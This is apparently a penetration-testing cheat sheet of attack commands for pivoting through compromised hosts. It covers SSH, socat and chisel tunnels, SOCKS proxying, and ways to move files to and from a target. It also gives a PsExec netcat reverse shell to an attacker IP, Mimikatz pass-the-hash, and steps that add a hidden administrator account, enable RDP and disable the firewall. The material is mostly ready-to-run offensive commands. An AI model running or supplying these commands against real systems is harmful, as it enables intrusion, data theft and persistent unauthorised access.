- Local Port forwarding
- Remote port forwarding
- Socks Proxy
- Other tunneling options
- File Transfers
- Misc
- Will connect local port to target port on target IP.
- Usefull for example when database server is running on localhost on target and you want to connect to it on your kali.
ssh -N -L <LOCAL PORT>:127.0.0.1:<TARGET PORT> <USERNAME>@<TARGET IP>
- Will open local port on your kali (BIND_ADDRESS) and connect it to target port and IP over a HOP.
- Usefull for example when you owned 1 host that can connect to another host that is running mssql and you want to connect from your kali to that mssql service.
ssh -N -L <BIND_ADDRESS>:<LOCAL PORT>:<TARGET IP>:<TARGET PORT> <USERNAME>@<HOP IP>
- Open a port on local port and IP and send all traffic to target IP and port.
- Usefull for opening a port on the hop for receiving shells backs.
- Usefull for example when you owned 1 host that can connect to another host that is running mssql and you want to connect from your kali to that mssql service.
netsh interface portproxy add v4tov4 listenaddress=<LOCCAL IP> listenport=<LOCAL PORT> connectaddress=<TARGET IP> connectport=<TARGET PORT> protocol=tcp
netsh interface portproxy show v4tov4
netsh interface portproxy delete v4tov4 listenaddress=<IP> listenport=<PORT>
- https://netcologne.dl.sourceforge.net/project/unix-utils/socat/1.7.3.2/socat-1.7.3.2-1-x86_64.zip
- Download all dll's and executable on target
- Open a port on locap port and IP and send all traffic to target IP and port.
- Usefull for opening a port on the hop for receiving shells backs.
- Usefull for example when you owned 1 host that can connect to another host that is running mssql and you want to connect from your kali to that mssql service.
socat.exe tcp-listen:<LISTENING PORT>,fork tcp-connect:<TARGET IP>:<TARGET PORT>
- so we can connect with our windows tools for example
socat tcp-l:<LISTENING PORT>,fork tcp:<TARGET IP TO SEND IT TO (FIRST HOP)>:<TARGET PORT>
- Forward local port of target back to our kali
- Will connect local port back to our kali.
- Usefull for example when database server is running on localhost on target and you want to connect to it on your kali.
ssh -N -R <BIND_ADRESS>:<PORT>:127.0.0.1:<TARGET PORT> <USERNAME>@<ATTACKER IP>
plink.exe <USER>@<IP> -R <ATTACKER PORT>:<TARGET IP>:<TARGET PORT>
sudo ssh -N -D 127.0.0.1:9000 <username>@<IP>
ssh -J <USER>@<FIRST HOP IP> -D 127.0.0.1:9000 <USER>@<SECOND IP>
/opt/chisel/chisel server -p 443 --socks5 --reverse
./chisel.exe client <ATTACKER IP>:443 R:socks
- For linux
- Change proxychains config
socks5 <IP> <PORT> <USER> <PASS>
sudo vim /etc/proxychains.conf
proxychains <COMMAND>
- https://www.proxifier.com/
- For windows
- Open Proxifier, go to Profile -> Proxy Servers and Add a new proxy entry, which will point at the IP address and Port of your Cobalt Strike SOCKS proxy.
- Next, go to Profile -> Proxification Rules. This is where you can add rules that tell Proxifier when and where to proxy specific applications. Multiple applications can be added to the same rule, but in this example, I'm creating a single rule for adexplorer64.exe (part of the Sysinternals Suite).
- Target hosts fill in the target internal network range with the action
proxy socks <TARGET>
- NOTE: You will also need to add a static host entry in
C:\Windows\System32\drivers\etc\hosts
file:<DC IP> <DOMAIN>
. You can enable DNS lookups through Proxifier, but that will cause DNS leaks from your computer into the target environment.
runas /netonly /user:<DOMAIN>\<USER> "C:\windows\system32\mmc.exe C:\windows\system32\dsa.msc"
sekurlsa::pth /user:<USER> /domain:<DOMAIN> /ntlm:<HASH> /run:"C:\windows\system32\mmc.exe C:\windows\system32\dsa.msc"
- Install FoxyProxy https://getfoxyproxy.org/
- Configure Proxy IP and port, Username and Password.
- NTLM auth: https://offensivedefence.co.uk/posts/ntlm-auth-firefox/
sshuttle -r <USERNAME>@<TARGET> <RANGE(s) TO TUNNEL> --ssh-cmd 'ssh -i /home/user/Offshore/id_rsa_root_nix01'
sshuttle -r <USERNAME>@<TARGET> <RANGE(s) TO TUNNEL>
sudo service apache2 start #files in /var/www/html
sudo python3 -m http.server <PORT> #files in current
sudo python2 -m SimpleHTTPServer <PORT>
sudo php -S 0.0.0.0:<PORT>
sudo ruby -run -e httpd . -p <PORT>
sudo busybox httpd -f -p <PORT>
wget http://<IP>:<PORT>/<FILE>
sudo python3 /opt/oscp/impacket/examples/smbserver.py <SHARE NAME> <PATH>
dir \\<IP>\<SHARE NAME>
copy \\<IP>\<SHARE NAME>\<FILE NAME> <FILE>
copy \\<IP>\<SHARE NAME>\<FILE NAME>\*.* .
copy <FILE> \\<IP>\<SHARE NAME>\<FILE NAME>
If installed use the ftp package
Use native program with the -s parameter to use a input file for the commands
echo open 192.168.119.124 21> ftp.txt
echo USER offsec>> ftp.txt
echo lab>> ftp.txt
echo bin >> ftp.txt
echo GET accesschk.exe >> ftp.txt
echo GET winPEASany.exe >> ftp.txt
echo quit >> ftp.txt
ftp -v -n -s:ftp.txt
python -m pyftpdlib 21
ftp <IP>
Create vbs script
echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts >> wget.vbs
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
echo http.Open "GET", strURL, False >> wget.vbs
echo http.Send >> wget.vbs
echo varByteArray = http.ResponseBody >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
echo Set ts = fs.CreateTextFile(StrFile, True) >> wget.vbs
echo strData = "" >> wget.vbs
echo strBuffer = "" >> wget.vbs
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1))) >> wget.vbs
echo Next >> wget.vbs
echo ts.Close >> wget.vbs
Run VBS script to download file
cscript wget.vbs http://<IP>/<FILE> <FILE>
powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://<IP>/<FILE>', '<FILE>')
powershell -c "Invoke-WebRequest -Uri 'http://<IP>/<FILE>' -OutFile 'C:\Windows\Temp\<FILE>'"
nc -nlvp <PORT> > <FILE>
nc -nv <IP> <PORT> <FILE>
sudo socat TCP4-LISTEN:<PORT>,fork file:<FILE>
socat TCP4:<IP>:<PORT> file:<FILE>,create
powercat -c <IP> -p <PORT> -i <FILE>
make /var/www/upload.php on kali
<?php
$uploaddir = '/var/www/';
$uploadfile = $uploaddir . $_FILES['file']['name'];
move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile)
?>
Upload file in Windows client
powershell (New-Object System.Net.WebClient).UploadFile('http://<IP>/upload.php', '<FILE>')
Install tftp on kali
sudo apt update && sudo apt install atftp
sudo mkdir /tftp
sudo chown nobody: /tftp
sudo atftpd --daemon --port 69 /tftp
On windows client to send file
tftp -i <IP> put important.docx
powercat -c <IP> -p <PORT> -i <FILE>
Shell back to my machine with other user using netcat
PsExec.exe -u <COMPUTERNAME>\<USERNAME> -p <PASSWORD> \\<COMPUTERNAME> nc.exe <ATTACKER IP> <ATTACKER PORT> -e cmd.exe
#Enable RDP
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
#Enable more then 1 user login
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fSingleSessionPerUser /t REG_DWORD /d 0 /f
REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fSingleSessionPerUser /t REG_DWORD /d 0 /f
#Add user to RDP group
net user <USER> <PASS> /add /Y
net localgroup administrators <USER> /add
net localgroup "Remote Desktop Users" <USER> /add
#Disable firewall
netsh advfirewall set allprofiles state off
#RDP to machine
xfreerdp /u:<USER> /p:<PASS> /v:<TARGET>